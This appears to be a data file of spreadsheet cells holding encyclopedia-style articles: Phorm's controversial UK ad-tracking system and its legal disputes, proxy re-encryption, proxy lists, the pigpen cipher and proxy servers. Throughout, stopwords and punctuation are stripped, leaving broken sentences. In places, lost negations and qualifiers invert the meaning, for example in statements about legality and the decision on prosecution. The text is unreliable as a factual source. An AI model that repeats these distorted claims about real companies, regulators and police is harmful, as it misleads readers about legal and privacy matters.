parties consent interception order lawful extremely basic principle within legislation, cannot lightly ignored treated technicality." open letter information commissioner published fipr site.the conservative peer lord northesk questioned whether government taking action targeted advertising service offered phorm light questions legality data protection regulation investigatory powers acts.on april 2008, information commissioner's office ruled phorm would legal opt-in service. office stated closely monitor testing implementation phorm, order ensure data protection laws observed.the home office indicated phorm's proposed service legal users give explicit consent. office became subject controversy emails phorm released. emails showed company edited draft legal interpretation office, official responded agree this, becomes position think clients prospective partners comforted". liberal democrat spokeswoman home affairs, baroness miller, considered collusion: "the fact home office asks company worried actually falling outside laws whether draft interpretation correct completely bizarre."the register reported 2008 phorm's logo strongly resembled unrelated company called phorm design. they quoted smaller company's owner, simon griffiths: "i've solicitors look we'd court. [phorm are] obviously player clout. small design agency sheffield employs three people."until september 2010, phorm's webwise service also shared name webwise. monitoring phorm website using website change detection service alerted interested parties changes september 2010. phorm's website edited remove references word 'webwise'. phorm's webwise product become 'phormdiscover'.the office harmonization internal market (ohim) trade marks designs registration office european union website ctm-online database lists phorm's application 'webwise' trade mark name. british broadcasting corporation listed opponent grounds 'likelihood confusion'. city london-based legal firm bristows wrote ohim september 2010, withdrawing bbc's opposition saying, "the british broadcasting corporation instructed request withdrawal opposition b11538985" october 2010, removed webwise pages company website although november 2010 pages finally confirmed removed forum contributors campaign group called "nodpi.org".as june 2012, virgin media removed phorm webwise faqs customer-news section. european commission case phorm european union communications commissioner viviane reding said commission concerned phorm breaching consumer privacy directives, called government take action protect consumers' privacy. european commission wrote government june 2008 context eu's interest controversy, asked detailed questions ahead possible commission intervention. required respond letter month sent. spokeswoman department business, enterprise regulatory reform (berr) admitted august deadline.on september, berr refused register's request release full text reply european commission, released statement effect authorities consider phorm's products capable operated lawful, appropriate transparent fashion. unsatisfied response, european commission wrote october. martin selmayr, spokesman reding's information society media directorate-general said, "for matter finished. quite contrary."the government responded november, commission sent another letter government january 2009. this third letter sent commission satisfied explanations implementation european context phorm case. selmayr quoted register saying, "the european commission's investigation regard phorm case still ongoing", went commission proceed formal action authorities provide satisfactory response commission's concerns. april, european commission said "opened infringement proceeding united kingdom" regarding isps' phorm: commission receives reply, observations presented satisfactory, commission decide issue reasoned opinion (the second stage infringement proceeding). still fails fulfil obligations that, commission refer case european court justice. that day, response news item register regarding european commission's preparations government, phorm said technology fully compliant legislation relevant directives. this confirmed berr regulatory authorities note suggestion contrary commission's statement today." however, berr denied confirmation responded freedom information (foi) request also made day: examination paper electronic records revealed material. clarification information, berr never provided statement phorm never confirmed company “that technology fully compliant”. january 2012, dropped case government. reaction initial reaction proposed service highlighted deep concerns regards individual privacy property rights data. phorm defended technology face called "misinformation" bloggers claiming threatens users' privacy.most security firms classify phorm's targeting cookies adware. kaspersky lab, whose anti-virus engine licensed many security vendors, said would detect cookie adware. trend micro said "very high chance" would detection tracking cookies adware. tools echoed trend's concerns privacy security, urging phorm apply opt-in approach. specialist anti-spyware firm sunbelt software also expressed concerns, saying phorm's tracking cookies candidates detection anti-spyware software.ross anderson, professor security engineering cambridge university, said: "the message this: care privacy, virgin talk-talk internet provider." added that, historically, anonymising technology never worked. even did, stressed, still posed huge privacy issues.phorm engaged number public relations advisers including freuds, citigate dewe rogerson ex-house commons media adviser john stonborough attempt save reputation, engaged audiences moderated online webchats.the creator world wide web, berners-lee, criticised idea tracking browsing history saying "it's mine can't want something, negotiate agree, understand getting return." also said would change introduced phorm system. director world wide consortium, berners-lee also published personal design notes titled snooping", explains views commercial packet inspection references phorm.simon davies, privacy advocate founding member privacy international, said "behavioural advertising rather spooky concept many people." separate role 80/20 thinking, consultancy start-up, engaged phorm look system. said: impressed effort minimising collection personal information". subsequently quoted saying "[privacy international] does endorse phorm, though applaud number developments process". "the system appear mitigate number core privacy problems profiling, retention tracking [but] support system works opt-out basis." kent ertugrul later said made mistake suggested privacy international endorsed phorm: "this confusion apologise. endorsement fact simon davies, also director privacy international." stopphoulplay.com ertugrul website called "stopphoulplay.com", reaction phorm critics alexander hanff marcus williamson. ertugrul called hanff "serial agitator" campaigns phorm companies procter gamble, says williamson trying disgrace ertugrul phorm "serial letter writing". hanff believes stopphoulplay website's statements "completely irrelevant" campaign backfire ertugrul, williamson laments phorm "has stooped personal smears".when launched april 2009, stopphoulplay.com discussed petition prime minister downing street website. when originally launched page claimed, "the website managers downing street recognised mistake allowing misleading petition appear site, since provided assurances phorm permit happen again". that day, freedom information (foi) used request confirmation claim phorm april phorm removed quoted text website replaced nothing. prime minister's office replied request may, stating held information relation request concerning phorm's claim.a site's launch, correspondent darren waters wrote, "this battle sign ceasefire, sides [phorm anti-phorm campaigners] settling attrition, governments, drawn crossfire."the site closed september 2009 online casino. however, pages http://stopphoulplay.com/this-is-how-they-work/ http://stopphoulplay.com/this-is-who-they-are/ still contain comments hanff nodpi. trials after initial denials, group confirmed small scale trial, exchange, "prototype advertising platform" 2007. trial involved tens thousands users. customers able trial—bt said developing improved, non-cookie based opt-out phorm—but decision made post-trial approach.the register reported earlier secret trial 2006, intercepted profiled browsing 18,000 broadband customers. technical report states customers participated trial made aware profiling, aims validation affect experience.on june 2008, copy 52-page report allegedly inside titled "pagesense external technical validation", uploaded wikileaks. report angered many members public; questions regarding involvement charity oxfam, make trade fair children's villages, whether made aware used many feel highly illegal technical trials. fipr's nicholas bohm said trials online system carried involving 30,000 customers potentially illegal.bt's third trial phorm's webwise system repeatedly slipped. trial last approximately weeks 10,000 subscribers, originally start march 2008, pushed april may; occur. company facing legal action trials phorm carried without user consent. september 2008, investigating complaint made anti-phorm protestors, city london police representatives informally question secret phorm trials. september police announced formal investigation secret trials phorm 2006 2007. according alex hanff, police said criminal intent behalf implied consent service going benefit customers. bohm said police response: saying customers gave implied consent absurd. there never behaviour customers could interpreted implied consent deliberately kept dark. issue whether criminal intent, well, intended intercept communications. that purpose doing. criminal intent misunderstand legal requirements criminal intent. september 2008, announced bt's support forum trial phorm's webwise system would commence following day. press officer adam liversage stated still working network-level opt-out, offered trial. opted-out traffic pass webwise system mirrored profiled. final full roll-out webwise across bt's national network necessarily depend completion work either.the open rights group urged bt's customers participate webwise trials, saying "anti-fraud" feature unlikely advantages features already built browsers.subscribers forums used beta forums criticise raise concerns bt's implementation phorm, responded statement: broadband support forums designed place customers discuss technical support issues offer solutions. ensure forums remain constructive we're tightening moderation policies deleting threads provide constructive support. example, removed number forum discussions webwise. want find webwise, provide lots information facility contact www.bt.com/webwise. hope continue enjoy part support community. according kent ertugrul, would completed rollout software 2009. wall street journal, however, reported july 2009 plans then, concentrating "other opportunities". phorm's share price fell news.on july 2009 bt's former chief press officer, adam liversage, described thoughts using twitter: year intensive, personal-reputation-destroying trench warfare comes nothing". ended comment "phantastic".in october 2009, sergeant mike reed city london police answered freedom information (foi) request. confirmed crime reference number 5253/08. response, stated originally passing case papers crown prosecution service (cps) december 2008, police '"asked provide evidence, october 2009". asked "disclose date investigation reopened", said instruction october 2009". sergeant reed's response named officer charge "d/s murray".on february 2010, reported continued work potential criminal case secret trials phorm's system. prosecutors considered whether press criminal charges unnamed individuals part regulation investigatory powers act.it april 2011 decided prosecute would public interest, stating neither phorm acted faith penalty imposed would nominal.in april 2012, reports said officer city london police taken lunch phorm. police spokesperson quoted saying aware allegation, formal complaint received, "the force reviewing information available deciding best course action." spokesperson also highlighted that, "city london police involved investigation phorm decision investigate prompted advice". advertisers websites advertisers initially expressed interest phorm include: financial times, guardian, universal mccann, myspace, ivillage, omd, virgin media unanimis. guardian withdrawn targeted advertising deal phorm; email reader, advertising manager simon kilby stated true conversations [phorm] regarding services concluded time want part network. decision small part conversations internally product sits values company." response article published register march 2008, phorm stated myspace joined publisher. financial times decided participate phorm's impending trial.the org's killock said many businesses "will think [commercial] data relationships simply private customers decide," might even believe "having data spied upon form industrial espionage". david evans british computer society questioned whether publishing website giving consent advertisers make site's content monitor site's interactions customers.pete john created called dephormation, servers users remain opted-out system; however, john ultimately recommends users switch phorm-equipped internet providers: "dephormation solution. leaf privacy. rely dephormation protect privacy security. need find isp."in april 2009, amazon.com announced would allow phorm scan domains. wikimedia foundation also requested opt-out scans, took necessary steps block wikimedia wikipedia domains processed phorm system 16th month.in july 2009 nationwide building society confirmed would prevent phorm scanning website, order protect privacy customers. internet service providers metrofi, american municipal wireless network provider linked phorm, ceased operations 2008. three isps linked phorm changed clarified plans since first signing company. response customer concerns, talktalk said implementation would "opt-in" opposed bt's "opt-out") "opt traffic split avoid contact webwise (phorm) server. july 2009, company confirmed would implement phorm; charles dunstone, boss parent company, told times going [phorm] whole industry interested enough own."business news magazine media reported april virgin media moved away phorm expected sign deal another company named audience science, would meet advertising companies gain calls "general market intelligence" phorm. called moves shift strategy media companies". later, magazine said companies' relationships phorm actually remain unchanged.although virgin media reported "moved away phorm", november 2010 uk-based still carry information phorm's webwise system website. addition, phorm partners international isps telefónica brazil, ttnet-türk telekom turkey, romtelecom romania. countries post united kingdom south korea phorm announced beginning market trial south korea london stock exchange's regulatory news service (rns) march 2009. subsequently, announced 2009 commenced trial. july 2009 phorm indicated trials proceeding expected. notice 2009 interim report accounts, published september 2009, phorm stated "nearing completion substantial market trial, launched may, largest south korea". existence trial south korea publicised ohmynews september 2009. september 2009 ohmynews announced trial shut down. brazil march 2010, phorm announced plans commercial deployment brazil.in 2012, brazilian internet steering committee issued resolution recommending phorm products internet service providers country, citing privacy risks concerns phorm's products would degrade quality internet services.in respect proposed partnership telemar (now known claim portal, penetration market phorm clear r$400 million "last year". turkey since launching ttnet, subsidiary türk telecom group, turkey 2012, phorm launched platform five additional isps. accordingly, global basis, million daily users phorm's platform. according number 3504c, january 2015, phorm moved remote cookie option whilst scaling back operations turkey. china phorm announced october 2013 launched operationally china commenced nationwide opt-in process. company announced commenced commercial operations china serving advertisements paid basis.privacy concerns china hong kong growing, significant developments privacy regulation, could impact phorm operations mainland hong kong. 2012 mainland china passed regulations implement measures protecting consumer privacy commercial exploitation.further privacy legislation arrived april 2013, publication draft rules ministry industry information technology: "provisions protection personal information telecommunications (provisions telecommunications internet users)", "internet users provisions registration true identity information phone users" (provisions phone users), along draft amendments 1993 consumer rights. laws emerging e-commerce china becomes increasingly significant part chinese economy.these regulations, include provisions regulating data collection smart devices, discussed article published international association privacy professionals' "privacy tracker" blog called "making sense china's privacy laws".in hong kong, office privacy commissioner personal data ("pcpd") taken robust approach protection consumer privacy, seek enforce provisions personal data (privacy) (amendment) ordinance 2012 ("amendment ordinance") came force april 2013. notes references external links official website</t>
  </si>
  <si>
    <t>Proxy re-encryption</t>
  </si>
  <si>
    <t>proxy re-encryption (pre) schemes cryptosystems allow third parties (proxies) alter ciphertext encrypted party, decrypted another. examples proxy re-encryption generally used party, bob, wants reveal contents messages sent encrypted public third party, charlie, without revealing private charlie. want proxy able read contents messages. could designate proxy re-encrypt messages sent charlie. this generates charlie decrypt message. sends charlie message encrypted bob's key, proxy alter message, allowing charlie decrypt this method allows number applications e-mail forwarding, law-enforcement monitoring, content distribution. weaker re-encryption scheme proxy possesses parties' keys simultaneously. decrypts plaintext, encrypts since goal many proxy re-encryption schemes underlying plaintext proxy, method ideal. defining functions proxy re-encryption schemes similar traditional symmetric asymmetric encryption schemes, addition functions: delegation allows message recipient (keyholder) generate re-encryption based secret delegated user. this re-encryption used proxy input re-encryption function, executed proxy translate ciphertexts delegated user's key. asymmetric proxy re-encryption schemes come bi-directional uni-directional varieties. bi-directional scheme, re-encryption scheme reversible—that re-encryption used translate messages charlie, well charlie bob. this various security consequences, depending application. notable characteristic bi-directional schemes delegator delegated party (e.g., charlie bob) must combine secret keys produce re-encryption key. uni-directional scheme effectively one-way; messages re-encrypted charlie, reverse. uni-directional schemes constructed delegated party need reveal secret key. example, could delegate charlie combining secret charlie's public key. transitivity transitive proxy re-encryption schemes allow ciphertext re-encrypted unlimited number times. example, ciphertext might re-encrypted charlie, charlie david non-transitive schemes allow limited number) re-encryptions given ciphertext. most known schemes bi-directional transitive. currently, known uni-directional, transitive proxy re-encryption done homomorphic encryption. cloud computing proxy re-encryption potential applications secure sharing cloud computing environment. cloud scenario re-encryption provided cloud operator/admin. looking bob, charlie, david example, cloud would take place charlie. generates re-encryption supply cloud. cloud operator/admin completes re-encrypt bob’s encrypted files david’s files whenever david downloads bob’s files. challenges exist cloud solution. user could conspire cloud operator gain access user’s, bob, files. second potential challenge segmentation access control. cloud user restrict access files assignment conditional values. however, number re-encryption keys grows proportionately number conditional values. this situation optimal resource constrained devices.proxy re-encryption confused proxy signatures, separate construction different purpose. also identity-based conditional proxy re-encryption references blaze, bleumer, strauss. divertible protocols atomic proxy cryptography. bertino, sandhu, "database security concepts, approaches, challenges." ieee transactions dependable secure computing (2005): 2-19 ateniese, green, hohenberger. improved proxy re-encryption schemes applications secure distributed storage. proceedings 12th annual network distributed systems security symposium (ndss 2005), diego, california, 2005. green, ateniese. identity-based proxy re-encryption. applied cryptography network security conference, june 2007. hohenberger, rothblum, shelat, vaikuntanathan. securely obfuscating re-encryption. proceedings theory cryptography conference (tcc), 2007. jhu-mit proxy re-cryptography library bibliography proxy re-cryptography</t>
  </si>
  <si>
    <t>Proxy list</t>
  </si>
  <si>
    <t>proxy list list open http/https/socks proxy servers website. proxies allow users make indirect network connections computer network services. proxy lists include addresses computers hosting open proxy servers, meaning proxy servers available anyone internet. proxy lists often organized various proxy protocols servers use. many proxy lists index proxies, used without changing browser settings. proxy anonymity levels elite proxies such proxies change request fields look like real browser, real address hidden. server administrators commonly fooled believing using proxy. anonymous proxies these proxies show real address, however, change request fields, therefore easy detect proxy used analysis. still anonymous, server administrators restrict proxy requests. transparent proxies (not anonymous, simply http) these change request fields transfer real such proxies applicable security privacy uses surfing web, used network speed improvement.socks protocol relays sessions firewall host allow application users transparent access across firewall. because protocol independent application protocols, (and been) used many different services, telnet, ftp, finger, whois, gopher, www, etc. access control applied beginning session; thereafter server simply relays data client application server, incurring minimum processing overhead. since socks never know anything application protocol, also easy accommodate applications encryption protect traffic nosy snoopers. information client sent server thus need test anonymity level socks proxies. external links proxy list curlie free based anonymizing proxies curlie</t>
  </si>
  <si>
    <t>Pigpen cipher</t>
  </si>
  <si>
    <t>pigpen cipher (alternatively referred masonic cipher, freemason's cipher, napoleon cipher, tic-tac-toe cipher) geometric simple substitution cipher, exchanges letters symbols fragments grid. example shows letters assigned grid. insecurity although pigpen might regarded cipher use, offers almost cryptographic security all. symbols instead letters impedes cryptanalysis, cipher otherwise different simple monoalphabetic substitution cipher. worse, well-known instantly recognizable, arguably among worst ciphers possibly choose security standpoint. indeed, knowledge pigpen ubiquitous interceptor might need actually break cipher all, merely decipher intended recipient would. pigpen's simplicity, often included children's books ciphers secret writing. history cipher believed ancient cipher said originated hebrew rabbis. thompson writes that, “there evidence suggests knights templar utilized pig-pen cipher” christian crusades.parrangan parrangan write used individual, mason, 16th century save personal notes.”in 1531 cornelius agrippa described early form rosicrucian cipher, attributes existing jewish kabbalistic tradition. this system, called "the kabbalah nine chambers" later authors, used hebrew alphabet rather latin alphabet, used religious symbolism rather apparent cryptological purpose.variations cipher used rosicrucian brotherhood freemasons, though latter used pigpen cipher often system frequently called freemason's cipher. hysin claims invented freemasons. they began using early 18th century keep records history rites private, correspondence lodge leaders. tombstones freemasons also found system part engravings. earliest stones trinity church cemetery york city, opened 1697, contains cipher type deciphers "remember death" (cf. "memento mori"). george washington's army documentation system, much randomized form alphabet. during american civil war, system used union prisoners confederate prisons. example using pigpen cipher shown example above, message marks spot" rendered ciphertext variants core elements system grid dots. some systems x's, even rearranged. commonly used method orders symbols shown image: grid, grid, another commonly used system orders symbols grid, grid, another grid, grid, grid, cell letter alphabet, last character. letters first grid dot, letters second dot, letters third dots. another variation last called newark cipher, instead dots uses three short lines projecting length orientation. this gives illusion larger number different characters actually exist.another system, used rosicrucians 17th century, used single grid nine cells, dots cell "pen". would left pen, followed first line, groups second, third. when enciphered, location symbol (left, center, right), would indicate letter represented. more difficult systems non-standard form alphabet, writing backwards grid, columns, completely randomized letters. templar cipher method claimed used knights templar uses variant maltese cross. this likely cipher used neo-templars (freemasons) 18th century, religious order knights templar 12th-14th centuries crusades. notes references barker, wayne (1978). history codes ciphers united states prior world aegean park press. isbn 0-89412-026-3. gardner, martin (1972). codes, ciphers secret writing. isbn 0-486-24761-9. kahn, david (1967). codebreakers. story secret writing. macmillan. kahn, david (1996). codebreakers. story secret writing. scribner. isbn 0-684-83130-9. newton, david (1998). "freemason's cipher". encyclopedia cryptology. isbn 0-87436-772-7. pratt, fletcher (1939). secret urgent: story codes ciphers. aegean park press. isbn 0-89412-261-4. shulman, david; weintraub, joseph (1961). glossary cryptography. crypto press. wrixon, fred (1998). codes, ciphers, cryptic clandestine communication. black leventhal publishers, inc. isbn 1-57912-040-7. external links online pigpen cipher tool enciphering small messages. online pigpen cipher tool deciphering small messages. cipher code true type font deciphering ominous cryptogram manhattan tomb presents pigpen cipher variant elian script-often considered variant pigpen.</t>
  </si>
  <si>
    <t>Proxifier</t>
  </si>
  <si>
    <t>computer networking, proxy server server application acts intermediary client requesting resource server providing resource.instead connecting directly server fulfill request resource, file page, client directs request proxy server, evaluates request performs required network transactions. this serves method simplify control complexity request, provide additional benefits load balancing, privacy, security. proxies devised structure encapsulation distributed systems. proxy server thus functions behalf client requesting service, potentially masking true origin request resource server. types proxy server reside user's local computer, point user's computer destination servers internet. proxy server passes unmodified requests responses usually called gateway sometimes tunneling proxy. forward proxy internet-facing proxy used retrieve data wide range sources cases anywhere internet). reverse proxy usually internal-facing proxy used front-end control protect access server private network. reverse proxy commonly also performs tasks load-balancing, authentication, decryption caching. open proxies open proxy forwarding proxy server accessible internet user. 2008, network security expert gordon lyon estimates "hundreds thousands" open proxies operated internet. anonymous proxy this server reveals identity proxy server disclose originating address client. although type server discovered easily, beneficial users hides originating address. transparent proxy this server identifies proxy server support http header fields x-forwarded-for, originating address retrieved well. main benefit using type server ability cache website faster retrieval. reverse proxies reverse proxy surrogate) proxy server appears clients ordinary server. reverse proxies forward requests ordinary servers handle request. response proxy server returned came directly original server, leaving client knowledge original server. reverse proxies installed neighborhood servers. traffic coming internet destination neighborhood's servers goes proxy server. reverse originates counterpart forward proxy since reverse proxy sits closer server serves restricted websites. there several reasons installing reverse proxy servers: encryption/ssl acceleration: secure websites created, secure sockets layer (ssl) encryption often done server itself, reverse proxy equipped acceleration hardware. furthermore, host provide single "ssl proxy" provide encryption arbitrary number hosts, removing need separate server certificate host, downside hosts behind proxy share common name address connections. this problem partly overcome using subjectaltname feature x.509 certificates extension tls. load balancing: reverse proxy distribute load several servers, server serving application area. case, reverse proxy need rewrite urls page (translation externally known urls internal locations). serve/cache static content: reverse proxy offload servers caching static content like pictures static graphical content. compression: proxy server optimize compress content speed load time. spoon feeding: reduces resource usage caused slow clients servers caching content server sent slowly "spoon feeding" client. this especially benefits dynamically generated pages. security: proxy server additional layer defense protect web-server-specific attacks. however, provide protection attacks application service itself, generally considered larger threat. extranet publishing: reverse proxy server facing internet used communicate firewall server internal organization, providing extranet access functions keeping servers behind firewalls. used way, security measures considered protect rest infrastructure case server compromised, application exposed attack internet. uses monitoring filtering content-control software content-filtering proxy server provides administrative control content relayed directions proxy. commonly used commercial non-commercial organizations (especially schools) ensure internet usage conforms acceptable policy. content filtering proxy servers often support user authentication control access. also usually produces logs, either give detailed information urls accessed specific users monitor bandwidth usage statistics. also communicate daemon-based and/or icap-based antivirus software provide security virus malware scanning incoming content real-time enters network. many workplaces, schools, colleges restrict sites online services accessible available buildings. governments also censor undesirable content. this done either specialized proxy, called content filter (both commercial free products available), using cache-extension protocol icap, allows plug-in extensions open caching architecture. websites commonly used students circumvent filters access blocked content often include proxy, user access websites filter trying block. requests filtered several methods, blacklists, regex filtering, mime filtering, content keyword filtering. blacklists often provided maintained web-filtering companies, often grouped categories (pornography, gambling, shopping, social networks, etc..). assuming requested acceptable, content fetched proxy. point, dynamic filter applied return path. example, jpeg files could blocked based fleshtone matches, language filters could dynamically detect unwanted language. content rejected http fetch error returned requester. most filtering companies internet-wide crawling robot assesses likelihood content certain type. resultant database corrected manual labor based complaints known flaws content-matching algorithms. some proxies scan outbound content, e.g., data loss prevention; scan content malicious software. filtering encrypted data filtering proxies able peer inside secure sockets http transactions, assuming chain-of-trust ssl/tls (transport layer security) tampered with. ssl/tls chain-of-trust relies trusted root certificate authorities. workplace setting client managed organization, devices configured trust root certificate whose private known proxy. situations, proxy analysis contents ssl/tls transaction becomes possible. proxy effectively operating man-in-the-middle attack, allowed client's trust root certificate proxy owns. bypassing filters censorship destination server filters content based origin request, proxy circumvent filter. example, server using ip-based geolocation restrict service certain country accessed using proxy located country access service.: proxies common means bypassing government censorship, although internet users circumvention tools.: some proxy service providers allow businesses access proxy network rerouting traffic business intelligence purposes.in cases, users circumvent proxies filter using blacklists using services designed proxy information non-blacklisted location. logging eavesdropping proxies installed order eavesdrop upon data-flow client machines web. content sent accessed including passwords submitted cookies used captured analyzed proxy operator. reason, passwords online services (such webmail banking) always exchanged cryptographically secured connection, ssl. chaining proxies reveal data original requester, possible obfuscate activities eyes user's destination. however, traces left intermediate hops, could used offered trace user's activities. policies administrators proxies unknown, user fall victim false sense security details sight mind. inconvenience risk, proxy users find blocked certain sites, numerous forums sites block addresses proxies known spammed trolled site. proxy bouncing used maintain privacy. improving performance caching proxy server accelerates service requests retrieving content saved previous request made client even clients. caching proxies keep local copies frequently requested resources, allowing large organizations significantly reduce upstream bandwidth usage costs, significantly increasing performance. most isps large businesses caching proxy. caching proxies first kind proxy server. proxies commonly used cache pages server. poorly implemented caching proxies cause problems, inability user authentication.a proxy designed mitigate specific link related issues degradation performance enhancing proxy (peps). these typically used improve performance presence high round-trip times high packet loss (such wireless mobile phone networks); highly asymmetric links featuring different upload download rates. peps make efficient network, example, merging acks (acknowledgements) compressing data sent application layer. translation translation proxy proxy server used localize website experience different markets. traffic global audience routed translation proxy source website. visitors browse proxied site, requests back source site pages rendered. original language content response replaced translated content passes back proxy. translations used translation proxy either machine translation, human translation, combination machine human translation. different translation proxy implementations different capabilities. some allow customization source site local audiences excluding source content substituting source content original local content. repairing errors proxy used automatically repair errors proxied content. instance, bikiniproxy system instruments javascript code order detect automatically repair errors happening browser. another kind repair done proxy accessibility issues. accessing services anonymously anonymous proxy server (sometimes called proxy) generally attempts anonymize surfing. anonymizers differentiated several varieties. destination server (the server ultimately satisfies request) receives requests anonymizing proxy server thus receive information user's address. requests anonymous anonymizing proxy server, however, degree trust present proxy server user. many proxy servers funded continued advertising link user. access control: some proxy servers implement logon requirement. large organizations, authorized users must gain access web. organization thereby track usage individuals. some anonymizing proxy servers forward data packets header lines http_via, http_x_forwarded_for, http_forwarded, reveal address client. other anonymizing proxy servers, known elite high-anonymity proxies, make appear proxy server client. website could still suspect proxy used client sends packets include cookie previous visit high-anonymity proxy server. clearing cookies, possibly cache, would solve problem. geotargeted advertising advertisers proxy servers validating, checking quality assurance geotargeted ads. geotargeting server checks request source address uses geo-ip database determine geographic source requests. using proxy server physically located inside specific country city gives advertisers ability test geotargeted ads. security proxy keep internal network structure company secret using network address translation, help security internal network. this makes requests machines users local network anonymous. proxies also combined firewalls. incorrectly configured proxy provide access network otherwise isolated internet. cross-domain resources proxies allow sites make requests externally hosted resources (e.g. images, music files, etc.) cross-domain restrictions prohibit site linking directly outside domains. proxies also allow browser make requests externally hosted content behalf website cross-domain restrictions place protect websites likes data theft) prohibit browser directly accessing outside domains. malicious usages secondary market brokers secondary market brokers proxy servers circumvent restrictions online purchase limited products limited sneakers tickets. implementations proxies proxy servers proxies forward http requests. request client regular http request except full passed, instead path. this request sent proxy server, proxy makes request specified returns response. some proxies allow http connect method forwarding arbitrary data connection; common policy forward port allow https traffic. examples proxy servers include apache (with mod_proxy traffic server), haproxy, configured proxy (e.g., application request routing), nginx, privoxy, squid, varnish (reverse proxy only), wingate, ziproxy, tinyproxy, rabbit polipo. clients, problem complex multiple proxy-servers solved client-server proxy auto-config protocol (pac file). socks proxy socks also forwards arbitrary data connection phase, similar http connect proxies. transparent proxy also known intercepting proxy, inline proxy, forced proxy, transparent proxy intercepts normal application layer communication without requiring special client configuration. clients need aware existence proxy. transparent proxy normally located client internet, proxy performing functions gateway router.rfc 2616 (hypertext transfer protocol—http/1.1) offers standard definitions: 'transparent proxy' proxy modify request response beyond required proxy authentication identification". 'non-transparent proxy' proxy modifies request response order provide added service user agent, group annotation services, media type transformation, protocol reduction, anonymity filtering". intercept traffic filtering security feature protects servers flood attacks, type denial-of-service attack. intercept available traffic only. 2009 security flaw transparent proxies operate published robert auger, computer emergency response team issued advisory listing dozens affected transparent intercepting proxy servers. purpose intercepting proxies commonly used businesses enforce acceptable policy, ease administrative overheads since client browser configuration required. this second reason however mitigated features active directory group policy, dhcp automatic proxy detection. intercepting proxies also commonly used isps countries save upstream bandwidth improve customer response times caching. this common countries bandwidth limited (e.g. island nations) must paid for. issues diversion/interception connection creates several issues. first, original destination port must somehow communicated proxy. this always possible (e.g., gateway proxy reside different hosts). there class cross-site attacks depend certain behavior intercepting proxies check access information original (intercepted) destination. this problem resolved using integrated packet-level application level appliance software able communicate information packet handler proxy. intercepting also creates problems http authentication, especially connection-oriented authentication ntlm, client browser believes talking server rather proxy. this cause problems intercepting proxy requires authentication, user connects site also requires authentication. finally, intercepting connections cause problems http caches, requests responses become uncacheable shared cache. implementation methods integrated firewall/proxy servers router/firewall host proxy, communicating original destination information done method, example microsoft wingate. interception also performed using cisco's wccp (web cache control protocol). this proprietary protocol resides router configured cache, allowing cache determine ports traffic sent transparent redirection router. this redirection occur ways: tunneling (osi layer rewrites (osi layer once traffic reaches proxy machine interception commonly performed (network address translation). such setups invisible client browser, leave proxy visible server devices internet side proxy. recent linux releases provide tproxy (transparent proxy) performs ip-level (osi layer transparent interception spoofing outbound traffic, hiding proxy address network devices. detection several methods used detect presence intercepting proxy server: comparing client's external address address seen external server, sometimes examining http headers received server. number sites created address issue, reporting user's address seen site back user page. google also returns address seen page user searches "ip". comparing result online checkers accessed using https http, intercepting proxies intercept ssl. suspicion intercepted, examine certificate associated secure site, root certificate indicate whether issued purpose intercepting. comparing sequence network hops reported tool traceroute proxied protocol http (port non-proxied protocol smtp (port 25). attempting make connection address known server. proxy accept connection attempt proxy when proxy finds server accept connection return error message simply close connection client. this difference behavior simple detect. example, browsers generate browser created error page case cannot connect http server return different error case connection accepted closed. serving end-user specially programmed adobe flash applications java applets send http calls back server. proxy proxy accepts target urls using form user's browser window, processes request, returns results user's browser. consequently, used device network allow "true" proxy settings changed. first recorded proxy, named "rover" time renamed 1998 "cgiproxy", developed american computer scientist james marshall early 1996 article "unix review" rich morin.the majority proxies powered cgiproxy (written perl language), glype (written language), phproxy (written language). april 2016, cgiproxy received million downloads, glype received almost million downloads, whilst phproxy still receives hundreds downloads week. despite waning popularity vpns privacy methods, september 2021 still hundred proxies online.some proxies purposes making websites accessible disabled people, since shut excessive traffic, usually caused third party advertising service means bypass local filtering. since many users care collateral damage causing, became necessary organizations hide proxies, disclosing urls take trouble contact organization demonstrate genuine need. suffix proxy suffix proxy allows user access content appending name proxy server requested content (e.g. "en.wikipedia.org.suffixproxy.com"). suffix proxy servers easier regular proxy servers offer high levels anonymity primary bypassing filters. however, rarely used advanced filters. onion proxy software system intended provide online anonymity. client software routes internet traffic worldwide volunteer network servers concealing user's computer location usage someone conducting network surveillance traffic analysis. using makes tracing internet activity difficult, intended protect users' personal freedom, privacy. "onion routing" refers layered nature encryption service: original data encrypted re-encrypted multiple times, sent successive relays, decrypts "layer" encryption passing data next relay ultimately destination. this reduces possibility original data unscrambled understood transit. anonymous proxy anonymous network ('i2p') proxy network aiming online anonymity. implements garlic routing, enhancement tor's onion routing. fully distributed works encrypting communications various layers relaying network routers volunteers various locations. keeping source information hidden, offers censorship resistance. goals protect users' personal freedom, privacy, ability conduct confidential business. each user runs router computer (node). router takes care finding peers building anonymizing tunnels them. provides proxies protocols (http, irc, socks, ...). comparison network address translators proxy concept refers layer application reference model. network address translation (nat) similar proxy operates layer client configuration layer-3 nat, configuring gateway sufficient. however, client configuration layer proxy, destination packets client generates must always proxy server (layer proxy server reads packet finds true destination. because operates layer-3, less resource-intensive layer-7 proxy, also less flexible. compare technologies, might encounter terminology known 'transparent firewall'. transparent firewall means proxy uses layer-7 proxy advantages without knowledge client. client presumes gateway layer idea inside packet, method, layer-3 packets sent layer-7 proxy investigation. proxy proxy server takes queries (usually local) network forwards internet domain name server. also cache records. proxifiers some client programs "socks-ify" requests, allows adaptation networked software connect external networks certain types proxy servers (mostly socks). residential proxy residential proxy intermediary uses real address provided internet service provider (isp) physical devices mobiles computers end-users. instead connecting directly server, residential proxy users connect target residential addresses. target identifies organic internet users. tracking tool identify reallocation user. residential proxy send number concurrent requests addresses directly related specific region. unlike regular residential proxies, hide user's real address behind another address, rotating residential proxies, also known backconnect proxies, conceal user's real address behind pool proxies. these proxies switch every session regular intervals. also references external links proxy software scripts curlie free web-based proxy services curlie free http proxy servers curlie</t>
  </si>
  <si>
    <t>Pills, porn and poker</t>
  </si>
  <si>
